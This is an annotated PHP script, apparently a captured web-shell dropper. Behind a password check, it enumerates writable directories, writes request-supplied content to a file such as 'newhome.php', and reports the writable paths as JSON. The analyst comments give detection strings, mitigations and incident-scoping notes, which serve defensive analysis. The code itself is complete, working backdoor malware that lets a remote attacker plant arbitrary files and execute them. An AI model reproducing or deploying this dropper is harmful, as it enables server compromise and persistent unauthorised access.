<?php
/*
 * Analyst annotation: this script is a header-gated remote file dropper.
 * When a request supplies the expected secret, it enumerates every writable
 * directory beneath the current working directory, writes request-supplied
 * content to a file in one of them, and returns the written path together
 * with the full list of writable directories as JSON.
 *
 * Inputs read from the request:
 *   - $_SERVER['HTTP_PASSWORD'] : secret (PHP exposes the "Password" request header under this key)
 *   - $_SERVER['HTTP_PATH']     : substring used to choose the target directory
 *   - $_SERVER['HTTP_NAME']     : file name to write, defaults to 'newhome.php'
 *   - $_SERVER['HTTP_FILE']     : read into $filePath but never used afterwards
 *   - $_POST['content']         : bytes written to the new file
 *
 * Strings a defender can search for in a webroot or in response bodies:
 *   "0381d04838d36d2d9be", 'newhome.php', 'new_file_path',
 *   'writable_directories', 'Incorrect password'.
 *
 * Exposure depends on the PHP process being able to write inside a tree from
 * which PHP is also executed; removing that write access, or disabling script
 * execution in writable directories, defeats the write-then-execute step.
 */

// No isset() guard here: when the header is absent PHP raises an undefined-key
// notice/warning and $password is null, so the block below is skipped and the
// script produces no output of its own.
$password = $_SERVER['HTTP_PASSWORD'];
if (!empty($password)) {
    // Optional parameters, each falling back to a fixed default when the header/field is missing.
    $pathParam = isset($_SERVER['HTTP_PATH']) ? $_SERVER['HTTP_PATH'] : '';
    $_fileName = isset($_SERVER['HTTP_NAME']) ? $_SERVER['HTTP_NAME'] : 'newhome.php';
    $filePath = isset($_SERVER['HTTP_FILE']) ? $_SERVER['HTTP_FILE'] : '';
    $remoteContent = isset($_POST['content']) ? $_POST['content'] : '';
    // Gate: 19 hex characters (offset 5 through 23) of the unsalted MD5 of the
    // supplied secret must equal the embedded constant. The plaintext secret is
    // not stored in the file; only this digest fragment is.
    if (substr(md5($password), 5, 19) === "0381d04838d36d2d9be") {
        // Relative path: resolved against the process's current working directory.
        // NOTE(review): under a web SAPI this is presumably the script's own directory - confirm per deployment.
        $path = './';
        $writableDirectories = getWritableDirectories($path);
        $targetDirectory = '';
        // Pick the first writable directory whose pathname contains $pathParam as a substring.
        foreach ($writableDirectories as $directory) {
            if ($pathParam != '') {
                if (strpos($directory, $pathParam) !== false) {
                    $targetDirectory = $directory;
                    break;
                }
            }
        }
        // No match (or no path hint): fall back to the first writable directory found.
        // reset() returns false on an empty list, in which case createFile() builds
        // the path "/<name>", i.e. an attempted write at the filesystem root.
        if (empty($targetDirectory)) {
            $targetDirectory = reset($writableDirectories);
        }
        $newFilePath = createFile($targetDirectory, $remoteContent, $_fileName);
        // The response discloses every writable directory under the start path,
        // not only the one that was written to.
        $response = [
            'new_file_path' => $newFilePath,
            'writable_directories' => $writableDirectories
        ];
        echo json_encode($response);
        die();
    } else {
        // A wrong secret gets a distinct JSON error body; that body in server
        // responses indicates the endpoint was probed.
        $response = [
            'error' => 'Incorrect password'
        ];
        echo json_encode($response);
        exit;
    }
}

/**
 * Recursively collect the pathnames of all writable directories under $path.
 *
 * SKIP_DOTS omits the "." and ".." entries, SELF_FIRST yields a directory
 * before its children, and CATCH_GET_CHILD makes the iterator skip children
 * it cannot open instead of throwing.
 *
 * @param string $path Directory at which the walk starts.
 * @return array List of pathnames for which isDir() and isWritable() are both true.
 */
function getWritableDirectories($path) {
    $writableDirectories = [];
    $directories = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($path, FilesystemIterator::SKIP_DOTS),
        RecursiveIteratorIterator::SELF_FIRST,
        RecursiveIteratorIterator::CATCH_GET_CHILD
    );
    foreach ($directories as $directory) {
        if ($directory->isDir() && $directory->isWritable()) {
            $writableDirectories[] = $directory->getPathname();
        }
    }
    return $writableDirectories;
}

/**
 * Write $content to "$directory/$_fileName" and return that path.
 *
 * The file name is concatenated without any validation, so it may carry path
 * separators or ".." segments; when scoping an incident, do not assume written
 * files are confined to the directories the script lists. The result of
 * file_put_contents() is not checked, so the returned path is reported even
 * when the write failed.
 *
 * @param string|false $directory Target directory (false when the caller found no writable directory).
 * @param string $content Data to write.
 * @param string $_fileName Request-supplied file name.
 * @return string The path that was passed to file_put_contents().
 */
function createFile($directory, $content, $_fileName) {
    $fileName = $directory . "/$_fileName";
    file_put_contents($fileName, $content);
    return $fileName;
}